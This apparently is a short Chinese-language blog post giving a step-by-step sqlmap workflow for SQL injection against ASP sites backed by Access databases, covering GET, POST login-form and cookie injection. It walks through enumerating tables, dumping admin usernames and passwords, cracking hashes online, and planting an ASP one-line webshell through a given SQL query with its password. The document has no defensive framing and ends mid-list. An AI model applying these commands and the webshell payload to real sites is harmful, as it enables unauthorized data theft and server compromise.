sqlmap指令

##access数据库+sqlmap指令
###get类型注入
1.检测是否存在注入点:
'and 1=1and 1=2
2.使用sqlmap进行检测注入点是否可用

sqlmap.py -u url

3.完整的access+sqlmap注入指令

一个完整的access注入过程命令

(1)注入点判断:sqlmap.py-u http://www.antian365.com/index.asp?id=1

(2)猜数据库表:sqlmap.py -u http://www.antian365.com/index.asp?id=1 –tables

输入线程:10,回车后开始跑表,找到合适的表后,按下ctrl+c终止跑表。

(3)对某个表进行字段猜解

sqlmap.py-u ” http://www.antian365.com/index.asp?id=1” –tables –columns -Tadmin

例如获取admin表的字段如下: id,username,password

(4)对admin表字段内容进行猜解

sqlmap.py -u " http://www.antian365.com/index.asp?id=1"--dump -T admin -C "username,password"
(5)获取明文密码或者加密密码。通过cmd5.com等在线网站进行明文密码破解。

(6)寻找后台地址,并登录后台

(7)通过后台管理寻求可以获取webshell的功能模块,尝试获取webshell。

知道web真实路径,且可以通过脚本执行查询,则可以通过查询来获取webshell,例如网站真实路径:d:\freehost\fred200903\web\,则查询语句为:

SELECT '<%execute request("a")%>' into [a] in ' d:\freehost\fred200903\web\x.asp;a.xls''excel 8.0;' from a
Shell地址:http://www.somesite.com/ x.asp;a.xls,一句话后门密码a。

###POST类型注入:

1.Accesspost登录框注入

注入点:http://xxx.xxx.com/Login.asp

(1)通过burpsurte抓包保存为txt文件,使用sqlmap进行自动注入

例如对着注入点使用burp抓包,保存tg .txt文件,使用命令:

./sqlmap.py-r tg.txt -p tfUPass
(2)自动搜索表单的方式

sqlmap-u http://xxx.xxx.com/Login.asp –forms

(3)指定一个参数的方法

sqlmap-u http://xxx.xxx.com/Login.asp --data "tfUName=1&tfUPass=1"
2.Cookie注入

sqlmap -u "http://www.xxx.com/news.asp"--cookie "id=1" --table --level 2

1.sqlmap -r test.txt
判断是否存在注入点,test.txt中对注入点记得加个*号来做一下标记
2.

Author

vague huang

Posted on

2022-05-01

Updated on

2023-02-14

Licensed under

Comments